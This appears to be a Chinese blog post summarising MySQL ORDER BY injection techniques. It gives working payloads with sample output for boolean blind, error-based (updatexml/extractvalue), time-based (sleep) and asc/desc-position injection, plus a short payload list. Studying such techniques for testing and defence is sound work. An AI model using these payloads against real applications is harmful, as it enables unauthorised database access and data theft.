zoukankan      html  css  js  c++  java
  • 小结--order by 注入

    之前已经学过的东西,准备把他们依次总结下,包括之前看的一些文章,一些小的tricks之类的,就先从注入开始吧

    0x01 盲注

    1. 判断1和0

    a. if

    select * from user where user_id=1 order by 1-if(substr(version(),1,1)=5,1,(select 1 union select 2));
    +-------+-----------+---------+
    | user  | password  | user_id |
    +-------+-----------+---------+
    | admin | admintest |       1 |
    +-------+-----------+---------+
    1 row in set (0.00 sec)
    

    b.rand

    mysql> select rand(true);
    +---------------------+
    | rand(true)          |
    +---------------------+
    | 0.40540353712197724 |
    +---------------------+
    1 row in set (0.00 sec)
    
    mysql> select rand(false);
    +---------------------+
    | rand(false)         |
    +---------------------+
    | 0.15522042769493574 |
    +---------------------+
    1 row in set (0.00 sec)
    

    这里可以利用rand(true) rand(false)的值不同,排序注入后面的顺序也不同

    mysql> select * from user order by 1-rand(substr(version(),1,1)=5);
    +-------+-----------+---------+
    | user  | password  | user_id |
    +-------+-----------+---------+
    | test  | testadmin |       2 |
    | admin | admintest |       1 |
    | sp4rk | sp4rktest |       3 |
    +-------+-----------+---------+
    3 rows in set (0.02 sec)
    
    

    c.regexp
    select * from user order by 1-if(1=(select 1 regexp if(1=1,1,0x00)),1,1);

    0x02 报错注入

    select * from user order by 1-updatexml(1,concat(0x5e24,version(),0x5e24),0);
    ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'
    mysql> select * from user order by 1-extractvalue(1,concat(0x5e24,version(),0x5e24));
    ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'
    

    0x03 延时注入

    select * from user order by 1-if(ascii(substr(user(),1,1))=114,sleep(5),0);

    0x04 asc desc处

    1.盲注

    mysql> select user from user order by user,if(substr(version(),1,1)=5,1,(select 1 union select 2)) desc;
    +-------+
    | user  |
    +-------+
    | admin |
    | sp4rk |
    | test  |
    +-------+
    

    报错,延时同上

    0x05 逻辑区别进行排序

    mysql> select user from user order by 1-if(1=1,user,user_id);
    +-------+
    | user  |
    +-------+
    | admin |
    | test  |
    | sp4rk |
    +-------+
    3 rows in set, 3 warnings (0.00 sec)
    
    mysql> select user from user order by 1-if(1=1,user_id,user);
    +-------+
    | user  |
    +-------+
    | sp4rk |
    | test  |
    | admin |
    +-------+
    
    payload:    ,if(1=1,user_id,user);
    ,(case when (1=1) then user_id else user end)
    ,ifnull(null,user_id)
    ,rand(1=1)
    
    

    0x06利用报错判断

    payload:
    if(1=1,1,(select 1 union select 2))  正确
    if(1=2,1,(select 1 union select 2)) 错误
    if(1=1,1,(select 1 from information_schema.tables)) 正确
    if(1=2,1,(select 1 from information_schema.tables)) 错误
    
  • 相关阅读:
    [转]How can I create a design netlist without including my source design files?
    [转]基于FPGA的以太网开发
    [转]GMII/RGMII/SGMII/TBI/RTBI接口信号及时序介绍
    [原]Altium画PCB时鼠标十字不能对准焊盘中心
    [转]Altera特殊管脚的使用(适用全系列Altera FPGA,MSEL区别除外)-来自altera论坛
    [转]STM32正交编码器驱动电机
    [转]使用D触发器制作正交编码器的鉴相电路
    [转]解决STM32开启定时器时立即进入一次中断程序问题
    [转]ISE iMPACT bit生成mcs
    [转]NiosII处理器软件代码优化方法
  • 原文地址:https://www.cnblogs.com/spark-xl/p/9080398.html
Copyright © 2011-2022 走看看